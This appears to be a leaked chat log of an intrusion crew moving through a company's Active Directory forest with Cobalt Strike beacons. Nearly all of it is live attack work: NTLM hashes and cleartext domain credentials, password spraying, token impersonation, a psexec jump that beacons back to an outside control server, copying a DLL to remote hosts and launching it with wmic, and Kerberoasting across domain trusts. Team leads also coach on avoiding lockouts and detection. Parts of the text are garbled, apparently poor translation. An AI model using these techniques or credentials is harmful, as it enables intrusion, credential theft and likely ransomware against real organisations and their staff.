aad3b435b51404eeaad3b435b51404ee:3f42b326ea1826890f7bb977474083dc ```s`svc.sccmcliinst I mean jumpscropped by sqladmin once try it once it's ok but the first part is for 1 domain you need both parts of the hash and you can't check it with the smloginommne 11 ``` 0: 80-20 80-20.com (Direct Outbound) 1: LEADERS leaders.frd.global 2: AUST standards.com.au (Direct Outbound) (Direct Inbound) 3: LEGALCO legalco.local (Direct Outbound) (Direct Inbound) 4: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound) 5: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound) 6: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound) 7: C360 c360.local (Direct Outbound) (Direct Inbound) 8: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound) 9: C360UK c360uk.local (Direct Outbound) (Direct Inbound) 10: SAIG saig.frd.global (Forest 5) (Primary Domain) (Native) ``1 trastpochom thing? everything is fresh, hit the ntlm is fresh? ntlm is fresh, the main thing is not to block i can't jump to any ntlm now, or smb login check for jump ntlm is fresh? 
sqladmin svc.msmap svc-apac-ems-search

I've got some dudes here that don't match mine and user7's; even if you do a ctrl+f in the browser everything matches except sqladmin, which doesn't:

```
adm.matdmy0 adm.barsmr0 svc.sccmcliinst adm.brodan0 svc-amer-ems-search adm.kinzac0 adm.kinzac1 adm.kalnic0 adm.evamar1 adm.turime0 adm.bisfra0 adm.brodav1 adm.taydav1 adm.macpet0 svc.sccmcliinst sqladmin svc.sccmcliinst svc-apac-ems-search
```

Successful pings of datacenter.local servers: sqladmin svc.sccmcliinst svc-apac-ems-search

Remove the intersections between these and I'll take a look:

```
adm.barsmr0 adm.taydav1 adm.brodan0 sqladmin adm.taydav1 svc.msmap adm.bisfra0 svc.sccmcliinst adm.brodav1 svc-apac-ems-search adm.kinzac0 adm.evamar1 adm.kalnic0 adm.kinzac1 adm.turime0 svc.sccmcliinst
```

Any cracks on them? Don't block them. Try to ping the unreachable ones through that trust? Or try LA, DA, EA, go to other accessible ones? How many domains did you get into? `portscan %.%.0/24 445 icmp 1024`?
I pinged the servers in the "remote" domain from a machine I own.
I'm sorry, I don't understand: you pinged the servers in the remote domain? Not the one you're in now, right?
I'm pinging the subnet now. I don't have access to the PDC, as I understand it. I pinged the servers in the "remote" domain from the machine which I have.
Critical only if "host not found": this means there is no link between the hostname in DNS and the actual machine, usually these are "abandoned" entries. Where there is loss, it means no visibility of the host, or it is disabled; often pings are simply filtered by hardware and these same hosts will ping normally from another place. Pings do not need to be broken down into 0% loss and 100% loss.
I'm aware of that. You can export, there is an export if it's more convenient for you.
How do you dump a hashdump into a file?
Hashdump results are saved in Cobalt under Credentials; you can select the needed hashdumps and copy them to your clipboard.

```
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 22:16:29> shell nltest /dclist:c360.local
[*] Tasked beacon to run: nltest /dclist:c360.local
[+] host called home, sent: 56 bytes
[+] received output:
Get list of DCs in domain 'c360.local' from '\\AUHDC1-C360-DC1.c360.local'.
AUHDC1-C360-DC1.c360.local [PDC] [DS] Site: AUHDC1-2
AUHDC1-C360-DC2.c360.local [DS] Site: AUHDC1-2
The command completed successfully

user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 22:17:47> shell nltest /dclist:SaigProd.local
[*] Tasked beacon to run: nltest /dclist:SaigProd.local
[+] host called home, sent: 60 bytes
[+] received output:
Get list of DCs in domain 'SaigProd.local' from '\\AUSYDHC-SPPDC03.SaigProd.local'.
AUSYDHC-SPPDC03.SaigProd.local [DS] Site: Default-First-Site-Name
AUHDC1-SPPDC02.SaigProd.local [PDC] [DS] Site: Default-First-Site-Name
AUHDC1-SPPDC01.SaigProd.local [DS] Site: Default-First-Site-Name
The command completed successfully

user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 22:18:35> shell nltest /dclist:standards.com.au
[*] Tasked beacon to run: nltest /dclist:standards.com.au
[+] host called home, sent: 62 bytes
[+] received output:
Get list of DCs in domain 'standards.com.au' from '\\ausydhc-austdc1.standards.com.au'.
sydcpdc00.standards.com.au [PDC] [DS] Site: SYD
ausydhc-austdc1.standards.com.au [DS] Site: SYD
The command completed successfully
```

How you can put a hashdump into a file, to tell you the truth, I do not know; except that nltest picks out exactly the primary domain controller, but usually LA on different DCs coincide, and even control over an RODC will advance us enough. In the dumps from the server OS:

```
adm.barsmr0 adm.taydav1 adm.brodan0 sqladmin adm.taydav1 svc.msmap adm.bisfra0 svc.sccmcliinst adm.brodav1 svc-apac-ems-search adm.kinzac0 adm.evamar1 adm.kalnic0 adm.kinzac1 adm.turime0 svc.sccmcliinst
```

Have their creds? Yes. Really? Yes :zany_face:

```
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.barsmr0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\svc.sccmcliinst:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.brodan0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\svc-amer-ems-search:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.kinzac0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.kinzac1:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.kalnic0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.evamar1:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.bisfra0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.brodav1:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.taydav1:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.macpet0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.matdmy0:Delta2021$',
[*] 10.225.10.201:445 -
Scanned 1 of 1 hosts (100% complete)
```

```
Group name     Enterprise Admins
Comment        Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
Administrator            msxservice
The command completed successfully.
```

See the collisions between the current users from DA and the LA list that you have. @user3, what EAs are in the domain? I.e. @user3 logged in under the DA token from the trusted domain, which turned out to be LA in this one. Mobilize: who is in LA?

```
SAIG\Domain Admins
```

Did the LA set come from the machine? What's with the PDC? @user3 oh, there's a set of LAs right there:

```
beacon> shell net localgroup "administrators"
[*] Tasked beacon to run: net localgroup "administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator adminstaff AndrewB arcserve AVinstall AW1.Service BN.Service CA - ArcServe caroot caunint CR.Service Damien DB.Service Domain Admins Enterprise Admins FL.Service FS-Tank Intranet-Service JF.Service JH.Service JonathanH martin.carlisle mj.service MR.Service msxservice Nathan.harper SAI.service saig.datacentre SAIG\Domain Admins ServiceController SN.Service ST.Service SzeWing.Austen WA.Service Wendy.Glasgow WM.Service
The command completed successfully.
```

Why did I increase the size of the chat messages? So that you could throw archives. From the PDC? I did not work under a token. @user3 send me the information I asked for, plz, with the "remote" domain. With the domain?
And tell me the local admins on the DC in your domain, and from which token. 1 attempt at each user should not come to trying smb_login.

```
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 21:52:50> shell net use \\c360.local\c$ Delta2021$ /user:c360.local\adm.turime0
[*] Tasked beacon to run: net use \\c360.local\c$ Delta2021$ /user:c360.local\adm.turime0
[+] host called home, sent: 94 bytes
[+] received output:
System error 86 has occurred.
The specified network password is not correct.
```

My pass. smb_login didn't match either, then. Did it under a token from the first time. There are a lot of users and a lot of local admins in the domain. Didn't work either. Can check this password on other domain admin accounts with authorization through the domain trust. Well, in general, yes, we got the answer anyway: the pass does not match.

```
dn:CN=datacenter.local,CN=System,DC=frd,DC=global >whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time >name: datacenter.local >securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534 >trustDirection: 3 [Inbound(1);Outbound(2)] >trustPartner: datacenter.local >trustType: 2 [UpLevel(2)] >trustAttributes: 8 [Transitive(8)]
```

Yes, datacenter.local. Is that right there a hostname in another domain?

```
beacon> shell net use \\datacenter.local\c$ Delta2021$ /user:datacenter.local\adm.turime0
[*] Tasked beacon to run: net use \\datacenter.local\c$ Delta2021$ /user:datacenter.local\adm.turime0
[+] host called home, sent: 106 bytes
[+] received output:
System error 86 has occurred.
The specified network password is not correct.
```

Try a different domain at once, with no jumps. No use, it is automatically made in the jumps. Ah, it was a token, and you need no use)

```
beacon> make_token saig.frd.global\adm.turime0 Delta2021$
```

This was a jump, especially when there are cleartext creds. The usual net use is better; don't check such things with a token. I try the last user with a different domain, this is with the current domain:

```
beacon> rev2self
[*] Tasked beacon to revert
beacon> make_token saig.frd.global\adm.turime0 Delta2021$
[*] Tasked beacon to create a token for saig.frd.global\adm.turime0
beacon> jump psexec_psh USHDC1-CSPADS02 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on USHDC1-CSPADS02 via Service Control Manager (PSH)
[+] host called home, sent: 214335 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[-] Could not open service control manager on USHDC1-CSPADS02: 1722
[-] Could not connect to pipe (\\USHDC1-CSPADS02\pipe\status_d482): 53
```

And then also check. @tl2 c360.local [10.195.43.2] ooo, it's just my one shared trust; I've already re-dumped the hashes, this is fresh: `Password last set 28/09/2020 9:43:00 AM` 1 only (`adm.turime0:Delta2021$`). And the password is possible? And the answer will come by itself =) This is more of a logical than a technical problem, i.e.
you can also use logic and roughly estimate which service can be connected to other domains and which "unlikely": read the descriptions of critical servers, look more closely at the very composition of the AD, in groups. The logic is simple: administrators do not multiply the services in each domain, saving resources and using the services of the "forest". The second option will be critical MSSQL servers, when data needs to be exchanged between quarantine and login (for example, some RDBMS behind an ERP/CRM system). Exchange and similar typical trust "cross-points" are WSUS / SCCM and other "forest" services; they most often see quarantined segments because they have an interface there and can be represented there. I recommend checking authorization logs on such servers (Seatbelt can do this), and so you can find other users from the trusts in the logs. (I will look at what is there then? But you will know that the pass for this account in the two domains is different, and so you will have 2 login errors, which will not lock an account in another domain.) With EA similarly, as an example:

```
net use \\datacenter.local\c$ P@ssword /user:saig.frd.global\adm.brodav1 || net use \\datacenter.local\c$ P@ssword /user:datacenter.local\adm.brodav1
```

So, there are 2 possible developments: either the current admin will be valid WITH the CURRENT domain or WITH the ACCEPTED one, saig.frd.global and datacenter.local.

Congruent DA:

```
adm.matdmy0 adm.barsmr0 svc.sccmcliinst adm.brodan0 svc-amer-ems-search adm.kinzac0 adm.kinzac1 adm.kalnic0 adm.evamar1 adm.turime0 adm.bisfra0 adm.brodav1 adm.taydav1 adm.macpet0
```

Congruent EA:

```
adm.matdmy0
```

We're interested in file storage, backups, EDR, virtualization systems. Find admins. Are we interested?

```
SolarWinds.MSP.RpcServerService.exe
```

These 2 will have to be searched for on WSUS servers. Ping request could not find host Anstat.local. Please check the name and try again. Ping request could not find host leaders.frd.global.
Please check the name and try again.
c360.local [10.195.43.2] SaigProd.local [10.195.100.1] standards.com.au [10.195.25.234]: pulled ADinfo and DA and general DA from saig.frd.global. `datacenter.local [10.225.10.201]`: pulled ADinfo, DA, EA, WinServs. By the way, from adjacent domains check the ping: not available. AUSYD1-COPADS02.saig.frd.global - 10.200.25.149 (shot hell). Get into them, dump, and drop the names and IPs here from those 5 visible ones. Received IPs and he pinged okay. Let's see, what is that, the hostname is not pinged, checked port 445. Selectively? Like out of 254 addresses chose 5 random?) The /24 was not scanned, only the trusts selectively. If he does not see the DC, it does not mean that he does not see anything else. Was the /24 subnet scanned on this domain for 139,445? Another thing, packet loss 100? That means no access from this point, it is not pinged. What does it mean, and from the others? Well, yes))) Not pinged from the current point?) And half not pinged, about 5 working) 14 domains, how many done? You have 19 pieces: 5 quarantines with normal trusts. Sort it out for now, leave the quarantine domains. I do not think that the commands above crashed. winlogon? Did not pay attention. When I jumped into winlogon, I think there was nothing. What is winlogon? There are two, I missed. winlogon? From what context was SYSTEM? Or there are 2? Or I do not understand it) 80-20 80-20.com

```
is that a whole name?
took the trusts from the server where I was, I wanted to ping syntax is wrong but that's not the point, it didn't even work and the session crashed out of the trusts
```
dn:CN=80-20.com,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2008/04/03-00:34:59 Eastern Daylight Time
>name: 80-20.com
>securityIdentifier: S-1-5-21-789336058-1343024091-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: 80-20.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
```
domain_trust 80-20 80-20.com what are the targets? It didn't even start.
portscan 80-20 80-20.com 445 icmp 1024
Use: portscan [targets] [ports] [arp|icmp|none] [max connections]
Jumped over and the session crashed entire log What could it be for?
beacon> net domain_trusts
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 104513 bytes
[+] received output:
List of domain trusts:
0: 80-20 80-20.com (Direct Outbound) (Direct Inbound)
1: LEADERS leaders.frd.global
2: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound)
3: C360UK c360uk.local (Direct Outbound) (Direct Inbound)
4: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound)
5: AUST standards.com.au (Direct Outbound) (Direct Inbound)
6: C360 c360.local (Direct Outbound) (Direct Inbound)
7: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound)
8: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound)
9: LEGALCO legalco.local (Direct Outbound) (Direct Inbound)
10: SAIG saig.frd.global (Forest 4) (Primary Domain) (Native)
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
saig.frd.global
beacon> shell nslookup 80-20 80-20.com
[*] Tasked beacon to run: nslookup 80-20 80-20.com
[+] host called home, sent: 55 bytes
[+] received output:
*** Request to UnKnown timed-out
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 52.58.78.16
DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
beacon> portscan 80-20 80-20.com 445 icmp 1024
[-] portscan error: Invalid port or range '80-20.com'
beacon> shell ping 80-20 80-20.com -n 1
[*] Tasked beacon to run: ping 80-20 80-20.com -n 1
[+] host called home, sent: 56 bytes
[+] received output:
Ping request could not find host 80-20. Please check the name and try again.
beacon> shell ping LEADERS leaders.frd.global -n 1
[*] Tasked beacon to run: ping LEADERS leaders.frd.global -n 1
from where did you ping the process? what? if you want access from the current domain - write the login I'll look at the server from where the session came as you leave the session kill) well, from those trusts that have pinged already got AD info, definitely, or do you think that there already is all AD is redone?) now you pass and you will be distributed to different servers just sorted DA from c360.local and sorted common from saig.frd.global and then the session fell off (-if the dll doesn't delete it, it's better to do it via dlld, list of servers from AD, and where there are no / few DA processes+ who fell off can get back into the network via the peers Select different servers and there away from the peers perform their tasks now should be+ -in a couple minutes will be anyone besides @user3 get into a different domain? who has a session fell off - that's the noise) distribute on different servers @user1 gave a session from another place I still alive) not at the same time but still in turn normally at the same time? noise in general in terms of noise is normal that we all trusts were started with one machine? shut down the server)
[+] received output:
Pinging 10.195.115.49 with 32 bytes of data:
Request timed out.
Ping statistics for 10.195.115.49:
Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
If you're talking about all the actions, then a couple of other accounts have been blocked) all the noise and kerb and AD, did we make noise?
32m respond in terms of dead @tl1 sessions fell off 2 pass between identical users in two domains can be identical 1 you deduct EA and DA from two domains and look for collisions here's what you're confusing me thought it was 20+ October I got confused in months of course ok) and the stoppass from 2027 changed what ok?
Password last set 27/09/2020 4:07:48 AM
Password expires 11/12/2020 4:07:48 AM
Password changeable 28/09/2020 4:07:48 AM
Password required Yes
User may change password Yes
Why? net user to check with mb_login? 1) the password to the account fits? or it changed? it seemed or why there is a pass in the domain I have not very good vision
beacon> portscan 10.225.10.201 445
[*] Tasked beacon to scan ports 445 on 10.225.10.201.
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.225.10.201' is alive.
[read 8 bytes]
[+] received output:
10.225.10.201:445 (platform: 500 version: 10.0 name: USHDC1-CSPADS02 domain: DATACENTER)
Scanner module is complete
Just like this, I added him to the targets on the datacenter will I get a jump like this? with the one you gave him found a man matching I downloaded from datacenter.local ad_users smarid? went ping on the host Team Lead 1 @tl1 not to copy anything directly there what's the best way to get a session on the pdc so you don't lock the account? have you done it under a token?
trustAttributes: 68 [Quarantined-Domain(4);Treat-External(64)]
I don't like his treat-external, is the domain big?
```
dn:CN=legalco.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2010/06/02-00:05:33 Eastern Daylight Time
>name: legalco.local
>securityIdentifier: S-1-5-21-1275210071-2025429265-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: legalco.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 68 [Quarantined-Domain(4);Treat-External(64)]
```
either there will be something else there at least 6 people per controller so either there will be 0 and nothing found - 136 users 828 groups - 98 it does not record gradually and at all, as I remember, adfind writes to the file as soon as the stream ends and DA 500, most likely there is not enough) if the pc 5 how many users, groups, pc, and so on @user8 one pc, router and bucket..xD That's what I wanted to hear, thank you, God bless all the good things depending on the purpose of the domain where 200+ where it could be 2000+ pc here not that each domain is the size of all the others) I, how should I say it ... not too early to stick it out? the guys there are 10+ meters less than a megabyte file me in the data center ad_computer to 136 comps only a question when the session will be in another domain, then you can learn LA on pdc @tl1 what command can you send a request for the withdrawal of admins to the PDC? DA, EA ok from ad_users are pulled, but LA with what can be pulled?
shell copy npCIDetect.dll \10.195.23.1\C$\ProgramData
shell wmic /node:10.195.23.1 process call create "rundll32 C:\ProgramData\npCIDetect.dll entryPoint"
how did it get there? @tl1 I'm walking around in the first posts @tl1 from AD what to get? or all? if they are identical, then in the future you can choose any of the options try -h 1 category remove and compare results if it goes well first try through -b do not know this key) and no copying files and logs do you have guides on adfind.exe? how do you do it?
great) @user3 where did you go? and how do you implement trust in this scheme? fill and run the adfind batch file before you fucking block the account again who the fuck else calm down man
beacon> make_token saig.frd.global\Americadpm B0b@f3tt
[*] Tasked beacon to create a token for saig.frd.global\Americadpm
[+] host called home, sent: 53 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> shell copy x64.dll \10.225.10.201\C$\windows\Temp\
[*] Tasked beacon to run: copy x64.dll \\\10.225.10.201\\C$\windows\Temp\
[+] host called home, sent: 76 bytes
[+] received output:
Access is denied.
0 file(s) copied.
My question again I ask you how do you remove adlocate an account in another domain where there is no access already unblocked accts should already have ceased to work with trusts but did not notice) ahahahahaht to you already in this domain)))))) and in mik potentially allowed to copy legalco.global how come) the current domain trusts the current domain) saig.frd.global
beacon> psinject 760 x64 Invoke-Kerberoast -outputformat hashcat | fl | out-file -filepath C:\Windows\Temp\Eula.txt -append -force -encoding UTF8
[*] Tasked beacon to psinject: Invoke-Kerberoast -outputformat hashcat | fl | out-file -filepath C:\Windows\Temp\Eula.txt -append -force -encoding UTF8 into 760 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
Failed to create the runtime host
what is the current domain?
beacon> make_token saig.frd.global\Americadpm B0b@f3tt
[*] Tasked beacon to create a token for saig.frd.global\Americadpm
[+] host called home, sent: 53 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> shell copy x64.dll \10.212.8.247\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\\10.212.8.247\C$\ProgramData
[+] host called home, sent: 73 bytes
[+] received output:
1 file(s) copied.
beacon> shell wmic /node:10.212.8.247 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.212.8.247 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 119 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 8036;
ReturnValue = 0;
};
what was the command? and what was the token? yes on the pdc from the trusts?
beacon> shell copy x64.dll \datacenter.local\C$\windows\Temp\
[*] Tasked beacon to run: copy x64.dll \\\datacenter.local\C$\windows\Temp\
[+] host called home, sent: 79 bytes
[+] received output:
The system cannot find the file specified.
0 file(s) copied.
beacon> shell copy C:\ProgramData\x64.dll \\\datacenter.local\C$\\windows\Temp\
[*] Tasked beacon to run: copy C:\ProgramData\x64.dll \\datacenter.local\C$\windows\Temp\
[+] host called home, sent: 94 bytes
[+] received output:
The system cannot find the file specified.
0 file(s) copied.
deleted the files made a token, copied the dll there, ran I took the token from the trusts, so all together not to sit on the same one did you take the token off? no questions followed, so it was clear to everyone the principle of trust I explained above or did you make the token? did someone copy something somewhere? to remove the kerbs from the trusts now also unlock the token an important object I unlocked the token how to unlock the token?
beacon> make_token saig.frd.global\sqladmin u5t3r
[*] Tasked beacon to create a token for saig.frd.global\sqladmin
[+] host called home, sent: 48 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes
beacon> shell copy x64.dll \\datacenter.local\C$\windows
[*] Tasked beacon to run: copy x64.dll \\\datacenter.local\C$\windows
[+] host called home, sent: 73 bytes
[+] received output:
The referenced account is currently locked out and may not be logged on to.
0 file(s) copied.
made a token on it copy the dll to datacenter.local this is a mistake how can I lock the account here tell me what you do))
User name sqladmin
Full Name SQL Admin
Comment SQL Service Account
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/08/2007 11:31:52 AM
Password expires Never
Password changeable 10/08/2007 11:31:52 AM
Password required Yes
User may change password Yes
The referenced account is currently locked out and may not be logged on to.
0 file(s) copied
Liverpool1! /user:saig.frd.global\adm.yorgar0
This is valid creds yes under this token can I do? let's you discuss the issues between you first) yes everything is? so, and the AD how to shoot if the files do not copy?
chs@1944! /user:saig.frd.global\adm.soucam1
I actually unhooked it with this error after the error did you exactly unhook it without the token?
datacenter.local [10.225.10.201] - removed the kerb under the token
ad-apse2.build.aws.saig - not pinged
ad-usea1.prd.aws.saig - not pinged
c360uk.local - not pinged
also not taken off
now it's hanging on this
beacon> psinject 440 x64 Invoke-Kerberoast Invoke-Kerberoast -OutputFormat HashCat -Domain legalco.local | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast Invoke-Kerberoast -OutputFormat HashCat -Domain legalco.local | fl into 440 (x64)
[+] host called home, sent: 133723 bytes
Are all the aces normal? c360.local SaigProd.local standards.com.au kerbs are not removed from them from any context currently available domains, remove AD info So the second removed kerbs, with the rest what?
ad-apse2.np.aws.saig - not pinging
saig.frd.global - 10.212.8.247
ad-euce1.prd.aws.saig - not pinging
usea1.np.aws.saig - dns not available, but it is not quarantined in ad_comp
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 17:34:03> shell net user CATOR-SQLSA /dom
[*] Tasked beacon to run: net user CATOR-SQLSA /dom
[+] host called home, sent: 56 bytes
[+] received output:
The request will be processed at a domain controller for domain saig.frd.global.
User name CATOR-SQLSA
Full Name CATOR-SQLSA
Comment Assurance BAT Service Account
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 23/11/2008 3:05:24 AM
Password expires Never
Password changeable 24/11/2008 3:05:24 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/10/2020 1:15:02 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *SG-Global-Azure-SAIGL*Domain Users
The command completed successfully.
Check all the accounts under which you did the tokens. The point is that if you do under the token, the account in the lock will fly)))))
The user name or password is incorrect.
What are you talking about?
So what, he has the same credentials does not match so everyone supported his answer because the rest did not respond to anything means @user7 said on behalf of the team) I kept quiet))) 2 1schat all lock... - so you removed them because mik token? how the pig will understand that we will address different? datacenter.local
dn:CN=datacenter.local,CN=System,DC=frd,DC=global
dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | how to understand
```
dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
```
```
dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:59:39 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
```
And you take the kerb on the trust, it is not in the quarantine how can you remove the kerb there at all?) if it is a quarantined domain.
beacon> psinject 440 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl into 440 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execption for details."
ERROR:
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR:
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR:
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< ()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull
ERROR:
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execption for details."
ERROR:
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR:
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR:
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< ()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull
ERROR:
as already taken down, take the kerbs in this domain from system, execute from DA? or to what?
"Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl" try to execute it from your @user9 have you had these errors? from current don't
beacon> psinject 440 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl into 440 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execption for details."
ERROR:
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR:
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR:
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< ()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull
ERROR:
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execption for details."
ERROR:
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR:
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR:
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< ()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull
ERROR:
Didn't you take it out after make_token?
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 17:18:22> psinject 2132 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain standards.com.au | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain standards.com.au | fl into 2132 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
